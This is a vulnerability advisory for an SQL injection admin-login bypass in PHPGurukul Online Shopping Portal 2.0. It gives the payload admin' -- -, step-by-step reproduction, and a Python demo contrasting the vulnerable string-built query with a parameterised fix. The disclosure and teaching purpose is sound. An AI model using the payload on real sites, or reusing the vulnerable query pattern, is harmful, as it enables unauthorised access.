Exploit Title: PHPGurukul Online Shopping Portal Project 2.0 - SQL Injection
Exploit Author: SeaWind
Vendor Homepage: https://phpgurukul.com/
Software Link: https://phpgurukul.com/shopping-portal-free-download/
Version: 2.0
Vulnerable endpoint: http://localhost/shopping/admin/index.php
Tested on: Windows 11, XAMPP

Description:
On the admin login page (http://localhost/shopping/admin/index.php) an SQL injection vulnerability was found in the username parameter. It allows an attacker to reach the admin panel pages (for example http://localhost:88/admin/todays-orders.php) without valid credentials.

Steps to reproduce:
1. Open http://localhost/shopping/admin/index.php
2. In the username parameter, enter admin' -- - as the payload, and fill the password parameter with anything. In my example, I fill the username parameter with the payload admin' -- - and use 123 as the value for the password parameter.
3. Click the login button. With that, I was able to log in to the admin panel page without knowing the real password.

Vulnerable code (/shopping/admin/index.php):
On line 9 the query SELECT * FROM admin WHERE username='$username' and password='$password' is built by interpolating the $username variable straight from the login form into the SQL string, with no validation, escaping or parameter binding, which makes it vulnerable to SQL injection. The single quote in the payload closes the username literal and the trailing -- - comments out the rest of the statement, so the password comparison is never evaluated and the query simply returns the admin row.
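The following is an added illustration, not code from the advisory or from PHPGurukul. It rebuilds the line-9 query in Python over an in-memory SQLite table so the bypass can be executed offline: the table layout and the stored password value are constructed for the demo (the real portal runs PHP against MySQL), and the parameterised variant shows the fix the vendor's code lacks. Note that MySQL only treats "--" as a comment when it is followed by whitespace, which is why the payload carries a trailing " -"; SQLite accepts "--" on its own, so the same payload works in both.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the portal's `admin` table (one admin row, demo password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin (username, password) VALUES ('admin', 'demo-secret')")
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The query exactly as admin/index.php assembles it: values spliced into the SQL text."""
    return f"SELECT * FROM admin WHERE username='{username}' and password='{password}'"


def vulnerable_login(conn, username, password):
    """Login check with the interpolated query. Returns True when a row comes back."""
    query = build_vulnerable_query(username, password)
    # With username = "admin' -- -" the statement becomes
    #   SELECT * FROM admin WHERE username='admin' -- -' and password='123'
    # and everything after -- is a comment, so the password is never compared.
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    """Same lookup with bound parameters: the quote and comment stay inside the literal."""
    query = "SELECT * FROM admin WHERE username=? and password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    payload = "admin' -- -"
    conn = make_db()
    print("interpolated SQL:", build_vulnerable_query(payload, "123"))
    print("vulnerable login bypassed:", vulnerable_login(conn, payload, "123"))
    print("parameterised login bypassed:", safe_login(conn, payload, "123"))
```

Running the script prints the spliced query text, then True for the string-built login and False for the parameterised one; the hardened version only succeeds when the real username and stored password are supplied.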